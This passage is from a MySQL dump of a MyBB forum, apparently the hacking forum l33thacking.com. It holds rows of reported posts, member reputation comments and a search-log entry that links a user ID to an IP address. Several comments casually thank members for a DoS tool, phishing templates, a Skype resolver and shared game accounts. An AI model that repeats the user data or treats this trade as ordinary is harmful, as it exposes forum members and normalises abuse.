'603', '47', '214', '1', 'LQP', '1350427548'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('48', '4897', '897', '65', '4', '1', 'Wrong forum', '1350438108'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('49', '5014', '909', '7', '222', '1', 'Rep Abuse', '1350448392'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('50', '5271', '941', '3', '222', '1', 'Wrong forum', '1350546737'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('51', '5454', '973', '7', '258', '1', 'Adult Content', '1350631764'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('52', '5593', '992', '17', '4', '1', 'Nonsense(Other)', '1350847631'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('53', '6046', '1046', '16', '1', '1', 'Wrong forum', '1350882149'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('54', '5288', '945', '7', '82', '1', 'Nonsense(Other)', '1350906129'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('55', '5956', '1031', '7', '9', '1', 'LQP', '1350937889'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('56', '6225', '613', '66', '82', '1', 'LQP', '1351031957'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('57', '6357', '1096', '7', '82', '1', 'LQP', '1351198495'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('58', '6409', '1101', '49', '222', '1', 'Nonsense(Other)', '1351235908'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('59', '6341', '1093', '7', '82', '1', 'Nonsense(Other)', '1351279055'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('61', '6743', '1156', '65', '4', '1', 'Wrong forum', '1351750242'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('62', '5258', '937', '68', '4', '1', 'SPAM', '1351750645'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('63', '6879', '1158', '74', '82', '1', 'LQP', '1351802496'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('64', '6805', '1158', '74', '82', '1', 'LQP', '1351802514'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('65', '274', '111', '29', '5', '1', 'Nonsense(Other)', '1351917325'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('67', '6706', '1144', '13', '4', '1', 'Wrong forum', '1351918893'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('68', '7045', '1195', '47', '67', '1', 'Nonsense(Other)', '1352209965'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('69', '7179', '1218', '17', '67', '1', 'Nonsense(Other)', '1352326349'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('71', '7269', '1227', '4', '2', '1', 'Nonsense(Other)', '1352433298'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('72', '7280', '1231', '15', '82', '1', 'Nonsense(Other)', '1352495852'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('75', '7445', '861', '7', '82', '1', 'LQP', '1352597835'); INSERT INTO `mybb_reportedposts` (`rid`, `pid`, `tid`, `fid`, `uid`, `reportstatus`, `reason`, `dateline`) VALUES ('76', '7530', '1093', '7', '82', '1', 'SPAM', '1352770479'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_reputation`; CREATE TABLE `mybb_reputation` ( `rid` int(10) unsigned NOT NULL AUTO_INCREMENT, `uid` int(10) unsigned NOT NULL DEFAULT '0', `adduid` int(10) unsigned NOT NULL DEFAULT '0', `pid` int(10) unsigned NOT NULL DEFAULT '0', `reputation` bigint(30) NOT NULL DEFAULT '0', `dateline` bigint(30) NOT NULL DEFAULT '0', `comments` text NOT NULL, PRIMARY KEY (`rid`), KEY `uid` (`uid`), KEY `pid` (`pid`), KEY `dateline` (`dateline`) ) ENGINE=MyISAM AUTO_INCREMENT=162 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_reputation` WRITE; INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('1', '0', '1', '0', '-25', '1339906486', 'Congratulations, you have been repfucked.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('2', '0', '3', '0', '-25', '1339906597', 'Great Admin'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('11', '1', '3', '0', '10', '1339984219', 'Famous joker'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('12', '1', '2', '0', '10', '1339991036', 'A good buddy of mine :P'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('10', '2', '1', '0', '10', '1339981488', 'Sup bro? welcome to l33thacking.com'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('16', '2', '3', '0', '10', '1340055032', 'Wassup bro, You are a great admin'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('38', '20', '1', '0', '10', '1345556205', 'No no no, Don\'t repfuck yourself.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('18', '1', '20', '0', '6', '1343925337', 'Excellent Administrator.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('23', '5', '1', '0', '5', '1344966144', 'Thanks for contributing to LH'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('24', '55', '1', '0', '10', '1344993611', 'Lol, I\'m the founder but thanks for joining.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('25', '1', '55', '0', '3', '1344993726', 'Admins that don\'t follow rules...Good job! ;D'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('26', '62', '1', '0', '10', '1345148956', 'There are no words to describe how good you are at graphics.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('141', '1', '61', '0', '10', '1350755969', 'Keep Moving us forward. You\'re doing a very good job here.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('28', '61', '1', '0', '10', '1352249588', 'Great Admin'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('29', '60', '1', '0', '5', '1345209643', '\"Hacking is a art\" LOL I love this quote.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('30', '54', '62', '0', '3', '1345225212', 'thanks for the ebook'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('31', '64', '1', '0', '5', '1345244525', 'Phishing theme template or whatever service'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('32', '67', '54', '0', '1', '1345263400', 'Thanks for the fix....'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('33', '61', '54', '0', '1', '1345263766', 'Keep up the good share in VIP section.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('34', '54', '55', '0', '3', '1345328603', 'You are really helpful.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('82', '1', '82', '0', '4', '1348713428', 'Oh you fancy huh?'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('83', '203', '61', '0', '6', '1349402194', 'I like you to homie, Stay Active!'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('39', '82', '1', '0', '10', '1345590940', 'Too HQ. Thanks for being so active on your first day. Your activity has helped LH a lot.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('41', '62', '90', '0', '3', '1345738161', 'thanks for razor ebook'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('42', '90', '62', '0', '3', '1345749889', 'thanks for the ebooks.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('43', '82', '5', '0', '3', '1345768655', 'This guy right here is a GENIASS'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('143', '200', '82', '0', '1', '1350846270', 'Nice HQ User. I like ;) Green Apples'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('45', '1', '54', '0', '3', '1345792251', 'These are max green apples that i can send you.. enjoy :)'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('46', '54', '1', '0', '10', '1345817407', 'Oh yeah? Guess what this is the most I can send :P'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('49', '67', '1', '0', '10', '1345854542', 'Why the heck didn\'t I ever +rep you before?'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('51', '67', '61', '0', '4', '1345914849', 'Amazing person! will go far here.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('56', '1', '141', '0', '3', '1346200772', 'Thank you for all of your uploads/shares'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('57', '141', '1', '0', '10', '1346253847', 'Thanks and welcome to LH.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('58', '8', '67', '0', '3', '1346259659', 'Thanks for the DoSer! http://l33thacking.com/showthread.php?tid=48'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('59', '84', '67', '0', '3', '1346273964', 'Thanks! http://l33thacking.com/showthread.php?tid=281'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('70', '82', '61', '0', '6', '1347077833', 'I enjoy this guy. Hes awesome, Stay HQ'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('61', '55', '2', '0', '10', '1346469610', 'Respect for: Stop being an asshole and picking on him. :)'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('62', '2', '55', '0', '3', '1346479949', 'Looks like a great guy, not sure why iPod keeps talking shit. :/'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('63', '84', '1', '0', '10', '1346646817', 'Grrr. It is a important announcement because I\'m important :P'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('65', '112', '1', '0', '5', '1346861183', 'Thanks for contributing and I have been looking for a nike SE method.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('67', '156', '61', '0', '4', '1346873334', 'Nice name.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('68', '156', '138', '0', '-3', '1346875031', 'Fanboy.......'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('69', '53', '1', '0', '10', '1347069612', 'Not anymore'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('72', '9', '82', '0', '4', '1347105161', 'You\'re very HQ. And I want you to stay like that. =]'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('73', '166', '1', '0', '10', '1347122861', 'Why didn\'t I ever +rep you before?'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('74', '61', '82', '0', '4', '1347402854', 'Funny.. Funny man. =] How do you like them apples?'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('75', '100', '82', '0', '4', '1347633689', 'Legit Service. A+ Recommended. =] -iTzIpod'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('76', '82', '112', '0', '3', '1347643652', 'Nice ebook'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('78', '53', '82', '0', '3', '1351636056', 'Adfoc.us views Trusted and HQ member.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('79', '62', '82', '0', '4', '1347825813', 'You\'re the definition of a GFX Master.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('80', '194', '61', '0', '6', '1348107288', 'I really hope slenderman isn\'t real..'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('81', '194', '82', '0', '4', '1348108281', 'You\'re so cool ;) :cool:'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('84', '203', '1', '0', '5', '1348887626', 'Nice sig :) and thanks for joining and being HQ'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('85', '1', '203', '0', '3', '1348887739', 'Sexy motha fuka HERE! :)'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('86', '1', '100', '0', '1', '1348889714', 'Nice guy ;D'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('87', '82', '100', '0', '1', '1348924476', 'I love this guy ;D'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('88', '203', '5', '0', '3', '1348969207', 'Useful contributoins.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('89', '100', '1', '0', '5', '1348977358', 'Legit service. Thanks'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('90', '62', '3', '0', '3', '1349024989', 'Thanks for the sig, I appreciate it.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('91', '62', '100', '0', '3', '1350414431', 'You have the sexiest GFX work. Your also really nice and have helped me out a few times. Keep it up man, glad to see such a HQ guy on LH ;D'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('92', '62', '203', '0', '3', '1349887615', 'made me a sexy ass sig and group userbar!'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('93', '199', '1', '0', '10', '1349138584', 'Thanks for coming online daily and being active daily.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('96', '3', '100', '0', '3', '1349873228', 'HQ guy, keep it up bro ;)'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('97', '203', '82', '0', '4', '1349396489', 'NL is so sexy <3'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('99', '61', '203', '0', '3', '1349401903', 'a really nice cooperative guy :) i like you...'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('101', '222', '1', '0', '5', '1350610357', 'Welcome to L33T Hacking! Edited: True don\'t spam the general section'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('102', '3', '1', '0', '3', '1349494749', 'Good Luck!'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('103', '3', '222', '0', '3', '1349496452', 'Get your rep back up :D'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('104', '225', '61', '0', '6', '1349500416', 'My bestest friend'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('106', '100', '3', '0', '3', '1349909575', 'HQ and Legit guy'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('107', '203', '3', '0', '-4', '1349920225', 'Bye Have A Great Time, http://www.youtube.com/watch?v=WUl9NPPMx8s'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('108', '228', '62', '0', '1', '1349967186', 'thanks alot :)'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('110', '254', '257', '0', '2', '1350184682', 'greed is a very nice user and HQ poster keep up the good work'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('111', '82', '257', '0', '3', '1350184837', 'a really nice user and he gave me what i wanted keep up the good work'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('112', '205', '1', '0', '10', '1350194133', 'How the heck did I never rep you before?'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('113', '82', '62', '0', '3', '1350229398', 'stay HQ bro :D'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('119', '254', '82', '0', '-1', '1350356648', 'Greed is a scammer. Traded a MC account for a AQW account and he changed the password in less that 24 hours.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('129', '228', '82', '0', '1', '1350595406', 'Keep it up :)'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('116', '1', '205', '0', '3', '1350268457', 'A great job with the forum, and certainly a great Admin.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('117', '4', '228', '0', '1', '1350347255', 'Thanks For The Congratz :P'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('118', '62', '228', '0', '2', '1350348319', 'Thanks for the +1 Rep'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('120', '228', '100', '0', '2', '1350395045', 'HQ guy, keep it up bro ;)'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('121', '100', '62', '0', '3', '1350399164', 'thanks bro :)'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('122', '1', '228', '0', '4', '1350424193', 'Thank you for inviting me to this forum. I really like it here'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('123', '257', '222', '0', '3', '1350457287', 'YUNO have any rep yet? Op NVM lmao'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('140', '222', '61', '0', '10', '1350755927', 'One of my favorite users here.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('125', '62', '5', '0', '3', '1350530099', 'Lol you just posted.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('126', '270', '53', '0', '3', '1350553876', 'Friendly member. Owner of efyu.net!'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('127', '257', '62', '0', '3', '1350554306', 'Thanks for the minecraft account bro :)'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('128', '61', '100', '0', '3', '1350564292', 'Your a nice moderator(:'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('130', '278', '228', '0', '4', '1350600966', 'Welcome Buddy'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('131', '214', '62', '0', '3', '1350637167', 'Thanks for the skype resolver.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('132', '258', '62', '0', '3', '1350650091', 'Nice tutorials, keep it up bro'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('135', '205', '222', '0', '3', '1350707190', 'Nice share...rep back ? <3'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('136', '255', '62', '0', '3', '1350724652', 'Thanks for the accounts :)'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('137', '228', '53', '0', '3', '1350730305', 'Nice member, very friendly'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('138', '53', '228', '0', '3', '1350730393', 'Always ready to help, Keep it Up'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('139', '222', '205', '0', '3', '1350732872', 'Elite member who deserves this.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('142', '172', '258', '0', '2', '1350802201', 'Great shares :D'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('144', '1', '257', '0', '3', '1350865315', 'THE GREATEST STAFF EVER XD'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('145', '228', '257', '0', '3', '1350865748', 'The nicest guy ever :)'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('146', '2', '257', '0', '3', '1351306115', 'the greatest staff ever XD'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('147', '61', '257', '0', '3', '1350869015', 'one of the greatest staff ever XD'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('148', '205', '257', '0', '3', '1350873001', 'a great and HQ user keep up the good work :)'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('149', '257', '1', '0', '5', '1350874783', 'Are you sure? Lol'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('150', '61', '222', '0', '3', '1350875968', 'YOLO BROMO YUSO FOSHO FROLO'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('151', '1', '62', '0', '3', '1350900684', 'great admin :)'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('152', '255', '53', '0', '0', '1351005430', 'Dont like you.. Dont know why.'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('153', '291', '257', '0', '3', '1351130169', 'Welcome my freind :O'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('154', '53', '257', '0', '3', '1351340728', 'Just a great user'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('155', '257', '53', '0', '2', '1351340788', 'Active and friendly user. <3 u'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('156', '7', '258', '0', '2', '1351404017', 'Thanks for the fonts :)'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('157', '7', '67', '0', '3', '1351507998', 'Thank you for making my pc faster! :D'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('158', '313', '257', '0', '3', '1351876815', 'hey man i am the referer so yeah and a good mate LOL'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('159', '160', '1', '0', '3', '1352224109', 'nice you sig is eye catching'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('160', '324', '257', '0', '3', '1352450653', 'Hoping to get that vouch'); INSERT INTO `mybb_reputation` (`rid`, `uid`, `adduid`, `pid`, `reputation`, `dateline`, `comments`) VALUES ('161', '199', '82', '0', '3', '1352771760', 'Deserves more rep. This user is the shit.'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_searchlog`; CREATE TABLE `mybb_searchlog` ( `sid` varchar(32) NOT NULL DEFAULT '', `uid` int(10) unsigned NOT NULL DEFAULT '0', `dateline` bigint(30) NOT NULL DEFAULT '0', `ipaddress` varchar(120) NOT NULL DEFAULT '', `threads` longtext NOT NULL, `posts` longtext NOT NULL, `resulttype` varchar(10) NOT NULL DEFAULT '', `querycache` text NOT NULL, `keywords` text NOT NULL, PRIMARY KEY (`sid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; LOCK TABLES `mybb_searchlog` WRITE; INSERT INTO `mybb_searchlog` (`sid`, `uid`, `dateline`, `ipaddress`, `threads`, `posts`, `resulttype`, `querycache`, `keywords`) VALUES ('b09369567c586a84e9785c762c4bec2b', '257', '1352768018', '203.104.11.7', '', '', 'threads', 't.lastpost >=\'1352681618\' AND t.fid NOT IN 